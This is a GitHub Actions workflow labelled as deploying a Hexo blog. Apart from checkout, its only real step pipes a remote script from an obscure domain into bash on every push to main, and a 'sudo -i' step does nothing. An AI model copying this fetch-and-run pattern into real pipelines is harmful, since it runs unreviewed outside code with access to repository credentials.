name: Deploy Hexo Blog

on:
  push:
    branches:
      - main

jobs:
  deploy:
    runs-on: ubuntu-latest
    steps:
      - name: Checkout code
        uses: actions/checkout@v3
      - name: Sudo
        run: sudo -i
      - name: Run qexo.sh
        run: curl -sSL https://kaocdn.us.kg/qexo.sh | bash
